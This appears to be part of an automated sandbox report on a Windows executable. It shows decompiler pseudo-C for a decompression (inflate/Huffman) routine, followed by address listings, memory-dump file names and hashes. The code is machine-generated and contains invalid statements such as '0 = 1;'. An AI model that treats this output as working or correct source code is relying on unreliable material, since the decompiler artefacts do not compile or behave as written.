												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406945
0x00406945
0x00406945
0x00406945
0x00406945
0x00406949
0x00000000
0x00000000
0x0040694f
0x0040694f
0x00406952
0x00406955
0x0040695a
0x0040695c
0x0040695f
0x00406962
0x00406965
0x00406965
0x00406968
0x00000000
0x00000000
0x0040696a
0x0040696a
0x0040696d
0x00406972
0x00406974
0x00406977
0x0040697d
0x004066dc
0x004066dc
0x004066df
0x004066e5
0x004066eb
0x004066f4
0x004066fa
0x004066fd
0x00406704
0x00406709
0x0040670f
0x0040671a
0x0040671a
0x00406983
0x00406983
0x0040698d
0x00000000
0x00000000
0x00406993
0x00406993
0x00406997
0x0040699a
0x0040699a
0x0040699e
0x004069a4
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x004069b2
0x004069d4
0x004069d4
0x004069d7
0x00000000
0x00000000
0x004069b4
0x004069b8
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c1
0x004069c4
0x004069c9
0x004069cb
0x004069ce
0x004069d1
0x004069d1
0x004069d9
0x004069d9
0x004069df
0x004069e2
0x004069e5
0x004069e5
0x004069ec
0x004069f0
0x004069f4
0x004069f7
0x004069fa
0x00406a00
0x00406a05
0x00000000
0x00000000
0x00406a07
0x00406a1b
0x00406a1b
0x00406a1f
0x00000000
0x00000000
0x00406a09
0x00406a0c
0x00406a0c
0x00406a13
0x00406a18
0x00406a18
0x00406a18
0x00406a21
0x00406a21
0x00406a24
0x00406a32
0x00406a38
0x00406a3d
0x00406a43
0x00406a49
0x00406a4f
0x00406a56
0x00406a6a
0x00406a6a
0x00407039
0x00407039
0x00407039
0x0040703e
0x00000000
0x00000000
0x00406676
0x00406676
0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00406c78
0x00406c7b
0x00406c7e
0x00000000
0x00000000
0x00406c84
0x00406c84
0x00406ca9
0x00406ca9
0x00406ca9
0x00406cab
0x00000000
0x00000000
0x00406c89
0x00406c89
0x00406c8d
0x00000000
0x00000000
0x00406c93
0x00406c93
0x00406c96
0x00406c99
0x00406c9c
0x00406c9e
0x00406ca0
0x00406ca3
0x00406ca6
0x00406ca6
0x00406ca6
0x00406cad
0x00406cad
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc2
0x00406cc5
0x00406cc7
0x00406cca
0x00406ccc
0x00406ce0
0x00406ce0
0x00406ce3
0x00406cfd
0x00406cfd
0x00406d00
0x00000000
0x00000000
0x00406d06
0x00406d06
0x00406d09
0x00000000
0x00000000
0x00406d0f
0x00406d0f
0x00000000
0x00406d0f
0x00406ce5
0x00406ce8
0x00406cef
0x00406cf2
0x00000000
0x00406cf2
0x00406cce
0x00406cd2
0x00406cd5
0x00000000
0x00000000
0x00406d1a
0x00406d1a
0x00406d3f
0x00406d3f
0x00406d3f
0x00406d41
0x00000000
0x00000000
0x00406d1f
0x00406d1f
0x00406d23
0x00000000
0x00000000
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d34
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d43
0x00406d4b
0x00406d4e
0x00406d51
0x00406d53
0x00406d56
0x00406d56
0x00406d58
0x00406d5c
0x00406d5f
0x00406d62
0x00406d65
0x00000000
0x00000000
0x00406d6b
0x00406d6b
0x00406d90
0x00406d90
0x00406d90
0x00406d92
0x00000000
0x00000000
0x00406d70
0x00406d70
0x00406d74
0x00000000
0x00000000
0x00406d7a
0x00406d7a
0x00406d7d
0x00406d80
0x00406d83
0x00406d85
0x00406d87
0x00406d8a
0x00406d8d
0x00406d8d
0x00406d8d
0x00406d94
0x00406d94
0x00406d9c
0x00406d9f
0x00406da2
0x00406da5
0x00406da9
0x00406dac
0x00406dae
0x00406db1
0x00406db4
0x00406dce
0x00406dce
0x00406dd1
0x00000000
0x00000000
0x00406dd7
0x00406dd7
0x00406dda
0x00406de1
0x00000000
0x00406de1
0x00406db6
0x00406db9
0x00406dc0
0x00406dc3
0x00000000
0x00000000
0x00406de9
0x00406de9
0x00406e0e
0x00406e0e
0x00406e0e
0x00406e10
0x00000000
0x00000000
0x00406dee
0x00406dee
0x00406df2
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfb
0x00406dfe
0x00406e01
0x00406e03
0x00406e05
0x00406e08
0x00406e0b
0x00406e0b
0x00406e0b
0x00406e12
0x00406e1a
0x00406e1d
0x00406e20
0x00406e22
0x00406e25
0x00406e25
0x00406e27
0x00000000
0x00000000
0x00406e2d
0x00406e2d
0x00406e30
0x00406e35
0x00406e37
0x00406e3d
0x00406e3f
0x00406e54
0x00406e56
0x00406e56
0x00406e41
0x00406e47
0x00406e49
0x00406e4b
0x00406e4b
0x00406e58
0x00406e5c
0x00406e5f
0x00406e65
0x00406e65
0x00406e68
0x00406e68
0x00406e68
0x00406e6a
0x00000000
0x00000000
0x00406e70
0x00406e70
0x00406e76
0x00406e78
0x00406e9d
0x00406ea0
0x00406ea6
0x00406eab
0x00406eb1
0x00406eb7
0x00406eb9
0x00406ebc
0x00406ec5
0x00406ecb
0x00406ecb
0x00406ebe
0x00406ec0
0x00406ec2
0x00406ec2
0x00406ecd
0x00406ed3
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee0
0x00406ee2
0x00406ee4
0x00406ee6
0x00406ee8
0x00406eeb
0x00406ef4
0x00406ef7
0x00406ef7
0x00406eed
0x00406eed
0x00406ef0
0x00406ef0
0x00406eeb
0x00406ee2
0x00406ef9
0x00406efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406efb
0x00406e7a
0x00406e7a
0x00406e80
0x00406e86
0x00406e88
0x00000000
0x00000000
0x00406e8a
0x00406e8a
0x00406e8c
0x00406e8e
0x00406e97
0x00406e97
0x00406e90
0x00406e90
0x00406e93
0x00406e93
0x00406e99
0x00406e9b
0x00000000
0x00000000
0x00406f01
0x00406f01
0x00406f06
0x00406f08
0x00406f09
0x00406f0a
0x00406f0b
0x00406f11
0x00406f14
0x00406f17
0x00406f1a
0x00406f1c
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f25
0x00406f25
0x00406f2e
0x00000000
0x00000000
0x00406f33
0x00406f33
0x00406f36
0x00406f39
0x00406f3b
0x00406fd2
0x00406fd2
0x00406fd5
0x00406fd7
0x00406fd8
0x00406fd9
0x00406fdc
0x00000000
0x00406fdc
0x00406f41
0x00406f41
0x00406f47
0x00406f49
0x00406f6e
0x00406f71
0x00406f77
0x00406f7c
0x00406f82
0x00406f88
0x00406f8a
0x00406f8d
0x00406f96
0x00406f9c
0x00406f9c
0x00406f8f
0x00406f91
0x00406f93
0x00406f93
0x00406f9e
0x00406fa4
0x00406fa6
0x00406fa9
0x00406fab
0x00406fb1
0x00406fb3
0x00406fb5
0x00406fb7
0x00406fb9
0x00406fbc
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fbe
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fbc
0x00406fb3
0x00406fca
0x00406fcc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fcc
0x00406f4b
0x00406f4b
0x00406f51
0x00406f57
0x00406f59
0x00000000
0x00000000
0x00406f5b
0x00406f5b
0x00406f5d
0x00406f5f
0x00406f66
0x00406f66
0x00406f68
0x00406f61
0x00406f61
0x00406f63
0x00406f63
0x00406f6a
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe4
0x00406fe4
0x00406fe7
0x00406fe9
0x00406fec
0x00406fef
0x00406fef
0x00406fef
0x00406fef
0x00000000
0x00000000
0x00000000
0x0040669d
0x00406681
0x00000000
0x00406687
0x0040668a
0x00406694
0x00406697
0x0040669a
0x00000000
0x0040669a
0x00406681
0x004066a5
0x004066a8
0x004066ac
0x004066b6
0x004066c0
0x004066c3
0x004066c9
0x004067fd
0x004067ff
0x00406805
0x00406808
0x0040680b
0x00000000
0x0040680b
0x004066cf
0x004066cf
0x004066d0
0x00406728
0x00406728
0x0040672f
0x004067d5
0x004067d5
0x004067da
0x004067dd
0x004067e2
0x004067e5
0x004067ea
0x004067ed
0x004067f2
0x004067f5
0x004067f5
0x00000000
0x00406735
0x00406735
0x00406735
0x00406735
0x00406739
0x00406739
0x0040675b
0x0040675e
0x00406760
0x00406763
0x00406768
0x0040673e
0x0040673e
0x00406743
0x00406745
0x00406747
0x0040674c
0x00406752
0x00406757
0x00406759
0x00406759
0x0040674e
0x0040674e
0x0040674e
0x0040674c
0x00000000
0x0040676a
0x00406797
0x0040679c
0x0040679e
0x0040679f
0x004067a1
0x004067a2
0x004067a2
0x004067a2
0x004067ca
0x004067cf
0x004067cf
0x00000000
0x004067cf
0x00406768
0x0040672f
0x004066d2
0x004066d2
0x004066d3
0x0040671d
0x00000000
0x0040671d
0x004066d5
0x004066d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00406832
0x00406832
0x00406832
0x00406835
0x00000000
0x00000000
0x00406812
0x00406812
0x00406816
0x00000000
0x00000000
0x0040681c
0x0040681c
0x0040681f
0x00406822
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x0040682f
0x00406837
0x00406837
0x0040683a
0x0040683c
0x00406841
0x00406844
0x00406846
0x00406849
0x00000000
0x00000000
0x0040684f
0x0040684f
0x00406851
0x00000000
0x00000000
0x00406857
0x00406857
0x0040685b
0x00000000
0x00000000
0x00406861
0x00406861
0x00406864
0x00406866
0x00406904
0x00406904
0x00406907
0x00406909
0x00406909
0x0040690c
0x0040690f
0x00406911
0x00406913
0x00406915
0x00406915
0x0040691e
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692f
0x0040692f
0x0040692f
0x00406932
0x00406938
0x00406938
0x0040693e
0x0040693e
0x0040693e
0x00000000
0x00406932
0x0040686c
0x0040686c
0x00406872
0x00406875
0x00406877
0x004068a2
0x004068a5
0x004068ab
0x004068b0
0x004068b6
0x004068bc
0x004068be
0x004068c1
0x004068ca
0x004068d0
0x004068d0
0x004068c3
0x004068c5
0x004068c7
0x004068c7
0x004068d2
0x004068d8
0x004068db
0x004068dd
0x004068df
0x004068e5
0x004068e7
0x004068e9
0x004068ec
0x004068f5
0x004068f5
0x004068f7
0x004068ee
0x004068ee
0x004068f1
0x004068f1
0x004068f9
0x004068f9
0x004068e7
0x004068fc
0x004068fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004068fe
0x00406879
0x00406879
0x0040687f
0x00406885
0x00406887
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688b
0x0040688d
0x00406890
0x00406897
0x00406897
0x00406899
0x00406892
0x00406892
0x00406894
0x00406894
0x0040689b
0x0040689d
0x004068a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a4
0x004069a7
0x004069aa
0x004069b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b87
0x00406b87
0x00406b87
0x00406b8a
0x00406b8d
0x00406b8f
0x00406b92
0x00406b98
0x00406b9f
0x00406ba1
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a9d
0x00406a9d
0x00406a9d
0x00406a9f
0x00000000
0x00000000
0x00406a7d
0x00406a7d
0x00406a81
0x00000000
0x00000000
0x00406a87
0x00406a87
0x00406a8a
0x00406a8d
0x00406a90
0x00406a92
0x00406a94
0x00406a97
0x00406a9a
0x00406a9a
0x00406a9a
0x00406aa1
0x00406aa1
0x00406aa9
0x00406aac
0x00406ab2
0x00406ab5
0x00406ab9
0x00406abd
0x00406ac0
0x00406ac3
0x00406adb
0x00406adb
0x00406ade
0x00406aec
0x00406aef
0x00406ae0
0x00406ae0
0x00406ae2
0x00406ae9
0x00406ae9
0x00406b18
0x00406b18
0x00406b18
0x00406b1b
0x00406b1d
0x00000000
0x00000000
0x00406af8
0x00406af8
0x00406afc
0x00000000
0x00000000
0x00406b02
0x00406b02
0x00406b05
0x00406b08
0x00406b0b
0x00406b0d
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b15
0x00406b1f
0x00406b1f
0x00406b21
0x00406b23
0x00406b2e
0x00406b31
0x00406b34
0x00406b36
0x00406b38
0x00406b3a
0x00406b3d
0x00406b40
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b55
0x00406b58
0x00406b5a
0x00000000
0x00000000
0x00406b60
0x00406b60
0x00406b64
0x00406b75
0x00406b75
0x00406b75
0x00406b77
0x00406b77
0x00406b7b
0x00406b7b
0x00406b7b
0x00406b7d
0x00406b7e
0x00406b81
0x00406b81
0x00406b81
0x00406b84
0x00000000
0x00406b84
0x00406b66
0x00406b66
0x00406b69
0x00000000
0x00000000
0x00406b6f
0x00406b6f
0x00000000
0x00406b6f
0x00406ac5
0x00406ac5
0x00406ac7
0x00406ac9
0x00406acc
0x00406acf
0x00406ad3
0x00406ad3
0x00406ba7
0x00406ba7
0x00406baa
0x00406bb1
0x00406bb5
0x00406bb7
0x00406bba
0x00406bbd
0x00406bc2
0x00406bc5
0x00406bc7
0x00406bc8
0x00406bcb
0x00406bd6
0x00406bd9
0x00406bf0
0x00406bf5
0x00406bfc
0x00406c01
0x00406c05
0x00406c07
0x00406c07
0x00406c07
0x00406c0a
0x00406c0c
0x00000000
0x00406c12
0x00406c12
0x00406c16
0x00406c21
0x00406c34
0x00406c39
0x00406c3e
0x00406c40
0x00000000
0x00000000
0x00406c46
0x00406c46
0x00406c49
0x00406c4b
0x00406c59
0x00406c59
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c4d
0x00406c4d
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406c53
0x00000000
0x00000000
0x00000000
0x00406ff2
0x00406ff2
0x00406ff8
0x00406ffe
0x00407003
0x00407009
0x0040700f
0x00407011
0x00407014
0x0040701d
0x00407023
0x00407023
0x00407016
0x00407018
0x0040701a
0x0040701a
0x00407025
0x00407027
0x0040702a
0x00407065
0x00407065
0x00000000
0x0040702c
0x0040702c
0x0040702c
0x00407032
0x00407035
0x00407037
0x0040706c
0x0040706e
0x00000000
0x0040706e
0x00000000
0x00407037
0x00000000
0x00406676
0x00407044
0x00000000
0x00407044
0x00406a58
0x00406a5a
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a5f
0x00000000
0x00406a5f
0x004069a4
0x00406965
0x00407049
0x0040704c
0x0040704e
0x00407057
0x0040705d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
